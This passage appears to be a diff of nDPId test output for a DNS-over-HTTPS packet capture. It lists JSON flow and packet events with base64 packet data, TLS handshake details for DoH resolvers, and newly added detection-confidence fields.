rzTS3d2OyN7sMIE6PuhUF9VrXN4uLhsAemVKcWU2V+BGjWtfszG7hr7paN5M0A6WlSiJP5ugBdx739u3B3W1+KfLwVvbAx3Uf4RJvYnlmACvSx012Jhzer\/yuM4tk3QVpBdK\/jPEaTPWBaLG7GbcEgCr8Dd01cNEaknAYaE3S81foMCYQWnkCSEzXoXSN2X+GKzFZl0S1\/cEXQGO2yVQzWkPUMhh0gTbASy1MtoPkBs1VLmccZG6VMIanE\/Pd1\/AmN+44wbWDJ+AcIisgRr14kHkecxeo6qEPvRckWi1Y+MB43PdM38kIUuB4ny7fwppqpmv8DILGQ0779kEvzfVRiZrCYvFXu\/QOSUdvmxjdD6cpAlFDWsPq2Pc93te5jeGVaL0ejtHRLIxI7z\/Q501zSpx\/Cya9ypg5U1NAxSXKe10YJjCTWrmOYKmnYerWRan08XbdkvYLJUzjKsspm7dhtxg0E1f4GsSbQFVWwrs\/ZM+C5sBOiJWUOh2pogAFGGsfjjO9vzloRUIbA2Ux9PdhnCAwgsxjwIpMB0l+UdFEMsbPJQhlOxGEwe2dnsCm5A+xtqvz5mH9nbAz2uU5hDs7xBrPc+8iDApG3YcmB6tDQMRmVl4wND49H4\/Hb2EGewuCKV1\/lze0iB9RIgI9rfK\/5kPRVAptvZ2+Rek\/4ghlbEG+l+OpOmeFXbOF8BuB9O0sPArzn0gERY+1PqlX8USIY4KAapC8vGnRNqePUVgog6kgSCom8jkuyrzOHCdEM1CnPySLw7a\/tPZxODv2GVX+BkBTvdcEhFOjQ1TZSMjExVd8xloEm8\/FJ6+H0jkz8IvfKaJAX48951TiRuA57Va3CSiHx+djtV0dMa0UJnQcAEaubJWYUsRu7sYXVg8tQm7wgM9eerw0ql07SNc\/dHQUxeGfY6HDVaN4jlbWxp48tTf5vFa+VilGPTo45486GBOKU+5wyUckgVnRpF60eC3RcISu3IMve+0In4k9R88DIjvwS1SST04NZPv7f41CsbwoBIpKZKJAFU+NplzdS0BOyBcGgjEAzzOtpFJ7jXjBK8x1DEPVeN6HSSbNaiOV7VevW0oBjFRBvVLEmxy48HjBSY3QWjS+yqFN8Qy4bledb1fb4GI3oWPT+BRcDAwEZfpmEI\/d7cy4YyqdnKDwIn\/k3qXWNAj2sXjRKguMhqhlkOdUvzFkzzM0xeuvfwnq6QSn3NpKskeWNBR8K+ECaE3mhCxghdnhLIum9rgOMvkgnfyBTDAfYKNN\/d62vQY6u4rbxXpDQk04FVnBPxSfPHXuC+oF8kMOU1++DK+ZoETlcuLrk2BRjjMQpK7pf+k1VI6pVnOclLhCXYHQjMUHZufh3HVG3mM7BF+lzB0K07EInEh+Ccp7LdqMGfKnUNXPWyokhcE9BzZJT2yWb8DylKWRWvZNetxzugclU9IhwHPPfcLEVBg0Fudoqm9ZGps0h7H+c6XIpsbql70txNRPE+wXofhHvkqNoGKLp9YrmmnKta0xlevWHOwMXAwMARTi1\/bQ1JQowGKIWBX\/iwQMAp\/a2d7gVFXnQQSu7gEMDkgFlDNq8l9T+VqanQcvXHm8wx\/TYqk2+tBPvp+6SO7GVVfwN5A=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00840{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":946739603327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739603327,"pkt":"REREREREZmZmZmZmCABFAAFFXkZAAKYGop0KAAABCQkJCsqGAbs6mTvywXrNXlAYAfbUBgAAFgMBARgBAAEUAwPEiPyvZDyiU8chFqn7v3nOV\/W\/daCFgBrWvLyeLgdOBSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHngAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIELSbbeQ+1Z\/PGkzWYpOrrGvdC\/XSIyiiMDimHGqOwN9"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739603327,"flow_last_seen":946739603327,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739603327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":946739603346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3068,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3068,"pkt_l4_len":3034,"ts_msec":946739603346,"pkt":"ZmZmZmZmRERERERECABFAAvuVbVAADsGC4YJCQkKCgAAAQG7yobBes1eOpk9D1AYAHferwAAFgMDAHoCAAB2AwPPxPF58rRx8NlAStddGtWmBxk0TsgFRMyjmLE2UJLzOSBmgVOewdr23+YbXlV2oJqCio3+iP7mE\/SqSoHvhanHnhMCAAAuACsAAgMEADMAJAAdACAXimL6oC2BgKKkKv2GFQZ0YvKv9UBLIqQLjYesKsDOXxQDAwABARcDAwAgsv\/aMwoaVLJwBsdUrBspRDIe6WOUfDjyPvz9+wtEYK8XAwMKaJbt\/ye5NqlSM6\/tOfe9bC5ygGHuvTHGsEkug50mliwDXC+zbimuaXpevBCVc6v4emlocpuYSolXpHjPLZ5mH\/n\/Wwg\/zT8DKTys1phOBjndqMIJ26DAd1BULzfsS4\/LPzxUrBzIWvX6A2LKLmwvvolWTixlKxXTGAwoKmNpvOmmolp5p0KnP+05uqYpZwQr1eiVG4Jbxo4RKPp2m5qudj526IfaIUxv6TymwnkyKidb8KJ7fECEEmqDTEJYi3AMqq0F6jVWm4S\/Cw3xWxFHQLXfbhWl\/xQNbH7sQr1+VP1aT1KVnkPOnmrjsvXKtU37nhtNVagiwB4tTsa0XjgxO6nNrduMisjiP1kYOcjiQ52IvQ8yUcLxoVZvs66brT2XF4X+BUOjv0f2D+iKuSPPaodKDokIKfB3EFHwrxtXROObndCkt2l8uoO\/YFwn4AVaivPS7QA9y1ZB5oLifA+q5b\/fsbKJUohIzT23SgYvI1FZi9km+tWoalj+0eMzm2XcwysPa97vGSKpeXtbzhnBE6t0DL+SCNAkdyN9iZf+SkkYuc1rpy8H6FsnB0MNHcLT\/7h9UpysD4zCa5uCyld0qhDdV3MzU7a7heBLLZvpkeoMCMY0KW7Nghl3Tf2jMPhPpMXgWhDsiEqTDOOStqJ6ji5D3nXcz67NA7onASlOfxCYNM8r0u017+zZIe1OE+PpBYW8chi30ujo48vE+6Zr1LXdzMZq7SQ9KcvNds70bZNXXOxSMjMXLVZIXnbsRiW02iiUe4S1V8qA1xoY+tL3PM\/3KBP4ZSUn0i9oU0Zm0bhbtwOS\/9R3KZPgmCI+1g7zZ+sqsIKC0g2uvkEsdNIqhrXU224qW6xxP\/j7fBBrVPw5fuLCU7p8+Yh1Cpxk4zFmUhl0XbcAlqLu7rHI4fQoDUdIgemBLeSEl1+Y\/z6KYsqD8NYrgKAvSsbZ1H\/Vdb3V1ajFVEUtmvJbvjf\/83uaxbTgecYPCPp7fDTlwk8SSHepVo8KtWsduLEs3DxEjvauvr9rL7FbVuDjSA3SeEqhFhGtSYJioWjgprG3WdpQzYP52GvnOKwXu7vjaJad3BS\/DxKTEtPTMDE4Fp6cDirnN3wrVazuNyc6gO+xpNalCZ8Rd4w5DmHczo4DwVyfZ9Fxz7k2fB4TnNz9ILT10qjnOlN\/ksy+JVVDJTTX6v+Ua3SCh6Bynhcuz7SktArn4gMoxcY2E4z4hIcGQHNkb+py02aK7EHGVgPR74HZosi0lhtUl4dpwbcfDHkQU+oVloy53x1IxuauA66S2qPneNDmRr8rKf9GU\/LJH2dezQ+WudmVZtgHXrLWtjuFmnH7eaBODVb8UwsA0Ge9wdJPfbyaGd7iLOv94vz10GXsEVy\/CXkZZhekrbvjToLvfDqaRAilCzMBHwybWhwwRUQsUh\/rPF7FXEJaXHA+eAZPWEuEetxByN3cFbJKFAiJ4IoKIRBIkGZxaTOcLn\/+XdFg3+W\/lMlmaqOUp903NihM97Rw4Bpqxex1vlYSLEh1ll9uJAf5iJVYMcmiqcaYXWfQOEXWR1wEE7wZE1+wo9+np3wP\/ty0jb3vy8+oqDWA8OdUjkdhqeUyfjZfa6t7pr4ITQpHLy0bNHsZ48wim0yu3Y7a6artue3kmQYcW2RckDOWxjAYg9ikO\/kwS062tZFHnT2VanvAd16qor00inyMS9VT8p\/085mt8kQkGSG0rip8q4xWZYbMFCfcEVkD4E5q7utpFEDkZ964uRE2Vw1PzBHn62rcmtvUqQaoGAFjFlHLMS40f9r+HKG7wRWTWQ29d16NsH+Xu0qXRhzWgjImijKWlv6KBGT1Cxynn\/KrehvF0361FyBUkJo1S1Ztxsubdf3ddeGeEr99d5oc\/xgpXMAl6ZIfUBPJjnOeC932\/TOOjMzG7PhOgunB+ggqQ5LQc0CX3c5BLlJtBtobycDsl7t\/eLrX\/bMfWq1dBy8SxYnEvGbNHrForDiuOA\/0lI3GVO62V5P1dM2BK8fdHneO0FhK969xszY4KacAP0CD5Aah0NJ2dzSGVZQtRmv\/TuFZlUQB3cFfHJYpNMU\/sn32bfB7GWJI2MhPEITiLal7HIPxgTikeJcDL13qUn7bk19T+rXcadCGiBoKDb40Dx6ogDfm4H0pA9C7OZJC0LRf01KZZRBjQs4x5ewT+p6+Og3SFrrTJ8ObJe\/TFocDQSMCBCWHQJqFicRtnWl4mmw+qTCsSoZQ\/ibkZFi+igS4TWV+31tPjazydJfOrW9xLZSgCilkMeJWYl8vH1ijLI+xCM8xxlQj5svlwHqvt+EkteECF3EKEt55AWpnRTNzzJivCSHy2gGPxW5UKKBkiSUoPFh0qyVjKN5HqDcW5MrFR2HpLqhuRbEXoannFiepiMp6aCVRMgYzvmQIyFH17\/3pokulHalnqX0gFQkjPqUPYf6B8\/o0H5LL0kahUiyL+d6BqSr8d42vsjYrpSfDaIcCW+FFGcj\/61Y6Fdihg57b1nq47mVWBJ9vcfq6xagmjwoJrNbwHaDS0XVSxL6y45zWrDfovrm0VvelVEdjwsn0FcoL6zZxDjjOt0EJP+OSVXcMeuY7uIG+KTnnHoV0vMvgMsIMiJbtYXgvda9zrqGty0FDqsOWmIdUCMf7t9LcgXTVP1POJeyDb0J4B38BTX3wUkWV7Ddf9ih9u7A\/m95uqIUbBJE2UeEbEEHif0BvcJl8E3UGeXVNiKRj7lxmplRVER7ystoW7OIAwNXC3MbNiwrjMNGlyZxeIZvGJIjHlQuApwLZsjzZzABT3\/zDbS43YjZzqyO21cEI3xf5DfWK6ZyU3Gjytb2PX5Te\/wOkKfusuGJNyYU73DNCw6\/IA2qWOmaw7\/mXzErXE2WxarQFcAU6el9VnuyWPJs57xlszen8XWYD0zQcAkiZ9pBOymEDFngWCP8+c+AEG42RtW8heXsNn6Oe2ZAWO\/0AXBzQr+rO1qlWDZzv3V7XELPKS49M71P\/6XXdYRKeCeHIn9vIc91j0OnL7GZzEPRVrpELGmw5rN7x6AqDoK3g\/LGcF47Fu59pwNqH3h40OLoshBk76izruGCqusL4Ms6YFarwUJkiUBlvhjjR7yHu721yX53PmlJXwCPueaRMxPhyJUl4AErQ3xPn5KAYXOjk3\/LnBLmSDl4f8PDkxmKUVaitsKqWvpl1TTX0fA2ZAqmTFey5ifEjBKLesy4caeyeCMEZZjMOhPX9MKfIEGous6lHCaZSQQHUSMY1BTylXmW622\/10lQS8aN1mce++r7\/TAswiTbum59NRH+1WXDpTaq5aRBgs7Pc6pr4lABNwxmieRHx0ER8V5gmxNVB9ACpzjEkp28DmYAH1\/iiBQfjkW2oblAVhUqcezWZUUEbpTbTAEj81Dzg+Fe2EsJFV2MiLhqH0ZMEkKY9oMnGyGvqY11wK7Qf4HXmtakoM3CF+wPbb9he7ffoRbYXCwbxTcDrBSEJdjOMhsSClbW03C9LGM4s6RAprMpnuw2wArtlzcr4bo701pOupS\/tdL5NkaZ2ZzsCChcDAwBgOnNpVcvc5YFZ3YuA8YRoqsuLDn4GImAnVqFIX3IzoTnZe29KOqUXQC0V61jJdr5Jnb3k3MOCdTH2u+HBBkKmYvlFb8GpDbcgObm2pFs9vNSY1WNyfnlLuFSQCBkHWe0UFwMDAEV7D2ZJm3CG6uFedmkozBwacoDrnHkQN6RCxC8K2l8lcKCSu3Q0j3XFRWsykB64fgtOqxtlPlxXpmtKrFqiyWDCeX9Q+Jw="}
-00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":540,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739603327,"flow_last_seen":946739603346,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3014,"flow_tot_l4_payload_len":3299,"flow_avg_l4_payload_len":1649,"midstream":1,"ts_msec":946739603346,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51846,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":946739603374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"ts_msec":946739603374,"pkt":"REREREREZmZmZmZmCABFAAB4XkhAAKYGo2gKAAABCQkJCsqGAbs6mT0PwXrZJFAYAfXTOQAAFAMDAAEBFwMDAEXJf2y8xWhMhAZA2WXz9agwI9f91RKP49sWLlsKAqD2Anz18+mnUXeRrd7MefwrF\/wulkzvUzp\/PNHsE\/j94eCMWT0CzeI="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":946739661512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"ts_msec":946739661512,"pkt":"REREREREZmZmZmZmCABFAAFFx6JAAK8GN2cKAAABuetRAa6gAbuz5lknlG0\/21AYAfbM4AAAFgMBARgBAAEUAwMfgFJ2Kafn6OC8bsQNsKFbNXsDyxgypaGgbuYoVgNdqiAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIIH2RRfX3PNaXYMOoXj3ynNGqfHChI6\/gAXerDGvzggi"}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739661512,"flow_last_seen":946739661512,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"ts_msec":946739661512,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739661535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"ts_msec":946739661535,"pkt":"ZmZmZmZmRERERERECABFAAxS7o9AADQGgG2561EBCgAAAQG7rqCUbT\/bs+ZaRFAYA+rX7QAAFgMDAHoCAAB2AwOIv9853ekbZoNmLmgcqNPyyS1j9KmZm6LL1EB3x+W+MyAeN08qEmNJsvb5yXXS9i9uE1kipCfBRoZuyc\/JvsnF3BMCAAAuACsAAgMEADMAJAAdACD6x6OWYowjGpQ7hpL1\/XAvKAPz7Qey4KV7v02zhqXZdBQDAwABARcDAwAgyc0HM+W8H8TE3DEJWTZrLIbavzRZjtX85L8RdcWlDvUXAwMKE3Ep4ySuvwn1mgGngq567huqNt4kq0krhrI\/h93Xu5m86O9X2PLgikjAQ\/f9b0D4TlJnxV9cGU04GfVlCuVdBuDl1OIowNDzv97yB1hnS\/nmnSeVxy1F8D7\/C2lvCqf2cxAVE09ueyG1Z8bXZ2QECTYKbWaJhHhH3grXMLxM9TK7dwfYp5ry3mgBLj8Im1sBBtK1ijR5DOPlXD4i38GWBdXuEFX66BB\/RJoRwVEIncNbQelSZeCqjUb3u++TUwMNQylDBUpnEAe47WxBvCiB3j4t00aQSmqM0TAluU8dwn7tiUiJEwAYZgDG8XeCA2d8CwkyaaNUs0P3Rp5Ub77dFKLlWkM7Ox84gnAyRhVMHCmMumYMkWKlAivuj\/eXgWwWByB6smKGxdGHvMorcYTbQq9mZYmNNNkDPDaVaw5533PFvpx4ba99q1b36RpLWXBUvp3e8mh0pBow5UcR930tP8k9y3Mp\/Hul\/USMW6fOtKvrODulyByiQtZSjqe6z4\/9jz9br68\/R0pBmxYIdiwDh9sAHDejB9VSYvk7ssbBQpn+Jgwnz6Ryy+sDgPoInVRafSLVQ2XaqYm5f6C0Jwzhr6UtNZ4\/zNTcpzOWnfrCB0SA4OuUkh\/XzE\/16DFk8ZQDliBoueyPhn8cEizoLe43IQ4BRx1FGhFopJsvL2cINLJIZh8DTM\/8W7f\/ASccXTbKN3NreGL2zPJ9HkyArzmAuS0H6AWBUpZyjU0X4LPypLaoIp74s3Z6LMGrDv+Q9HPcSM3AsvYaPpVMikXZgrncjZjmSO3nKjVK7tuPHzmBxV2ASbUY9dkYy7qS1LbwD5HCaZkMJLquTC43\/zrZa9Cf+VJlQO+7\/bTkI19jV7MBsNxvCJS3vho32OcNSgskst5WCDisQYxOEJ7yIiJ4Qj131r3komITCdIi6sfPNECBD925ao9iSOw1a3NghVbKi1Ke9+osy6p4OIfl7R\/jJIRkFpjTHB9lrhuKyd3x90HahF\/Bgrc+0OPDW3df50BV25QUTv0YHg583iZZwuimhgpeeN8oRbZn4Oz1sb61wMILMVA1YkIFgELm6QWH0EjBDa5PcdPXwcXSRAXJR2\/zX8giHU9oVoqfNaIjA+SmyaolS9o0C9Gxx9xhkTFg+SAbN3Goh5osUJrTzgif84rF3v\/clkf8\/ZhPyDROa9H0yWh+TK3VY9NLRXxv12lS5FZMqutTNAtmppSaz1n5imbXVp1Da9\/rGuGJgyHbUPRjpcY\/qQ4nrdYPUt0lBpjbxywR21B5bH94VrAutoZgT1NlpA1fjy8uX6CC\/PzzpWgwoLz2\/ah06JLAEuj5ndY\/3P\/Cea86JZSQRIAOkxHfXLLrlrueGx1dvDahl9VAk02WVblMiy86oo72YX2jdNNf7IRMOaPtI08s6slCfPDpn3bANNyLKCX6T8oskMhdiK\/HIjCb1KyAdgQ2+yLvi3d+MuMeWmC07amcrbn+OTYQQNPWx6i\/o5VJfAp896EdOSd0n7JnPYzTA1M2RyiA5D2thGuZ18x5oW4andkKefpZLKocbhraKqdRDR2qHe1UOjP7ac97YdAdmgxzkuJnD41fZ8SEi5Zg3NfdmEEfpkvRjC5orTLd0fIsx5c1+XLU\/R3b4bQM96DkiRuZJ1NUlIhf9JvTA7QhsNS9Evhm+KxSrzo4fPncRHMt8lm5+VkFq5jZsS\/4aS9tmtMGO7fcr\/LpSveCPtAloCQrU+vhpaXaC4\/SCuRji5PdK182R618OsLro46yH5FqoSw3EFuupxW4KHdDcJyAmbvTP3RLz1SxCnflYoAqTczyrDRGBg9\/VwVoEVI1F90s2UJwdF3wAnZAvtsFo0aX7P\/QLLigT0+21EtehOsx99nALYpQP+Wes4pdBUuuM1hrGs4phO3GFIyYVSCdORl3bwKcDgUn6jxeA5jLALqAkUQz6oQZAw+UAmaFT7liB5ZMHspe2Nk5qb3bDaj1FmXHIWt\/85M5M02qebtth3yNCkr6Yp8QH7DkvUBEcBvugZfGdO8uohym\/eNU58r4tZ+dX\/tuHtfYu\/HTthyF6zJIA5NCwZI8ZPOa0Ik2ZVHuDdccBZzRFIr6iS6N658h5UD2w34\/Zc25OfWHIIyNU8f8\/IYCk9XVJNve0Okk42KtkEZEvU5b0G1QgC8PnK8r+XSR+vGYlx30IHhP0Drstay6UqCpdjb38zyt16Qx9KI1K78\/2x0ZLR7g9lNe5aJSm2DGdBsBLk1r5a74FD95UK8Adgld6WS3J1isO2nKe9Xs1y3yG0BHL6PVzcVJ6xLZkhyj81HERDbvsw89dCQ0RJq5YmEae+boIDnKyAnLYzUgmbMRlc1g8JOgQmr6\/NRcNQVzPj9Tmr7h+4nauDzZ0EwSB6bpnhekE6zTzsN8ksFy6WPV1V2TWaFMCxIJpm4tqxJloTCvFyT3CBtW57hPqqD33WSzMFQ4mYuH5Kgu\/JydyuTxbX33iR4YxYd7QhqiqEqf7Z40jPc99ZwAIj52PTzQ7U+ojkqP4MuUynWiVDvS\/8M2\/Vvth6PA4ClC+NG9V0jqT2CwEy0LU0ERe0qEd656+zZx\/fgC3xfIuWV0svyqgeH7U8anrlDCpp7N40O2SWqb3L3JMSf4o49g5Y7jySS1fW2+m5VjaQqCccoq+\/wn0QIhjH7Xd2oER1gcyADsjGJt5aqBudWst9NAdC7\/E6mgwXOhZmtXb1lcPmN1A3ldDXRkgXTncFzTkiGIgqqygowkLd1h\/u0K8p6hXN6SporJbwLrTenWrNDIG63gFBLm2D7U+S642eghPumVgo7B1N6elGvUpSDX3m8qB6zRisoSKoWKWO5xgUo0OWMndotDAaZPAq3bhL2Pxzdl9WOKnnP6NOK4+F4BC3OgZgYIEUhrknbM3wBtdHfsfGuj0RFj5lNw2AlFe8pNBDRkjYdmUdc0f\/vnWwnfo22NWKX1BdiVu7196lmWb3TQ4gFhlK81yNy7eFJuFbgrYZ5PUlfjIwTDgxIXshraxns8270zwqor2u3QZYQoN4I1EUcEja7lh2qdAWxfca\/zxpKtNeCFUm8zfvAy2hjwmAqVnw7n4Et+Xyf9ksFEQ4\/qzsOHpBM0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTId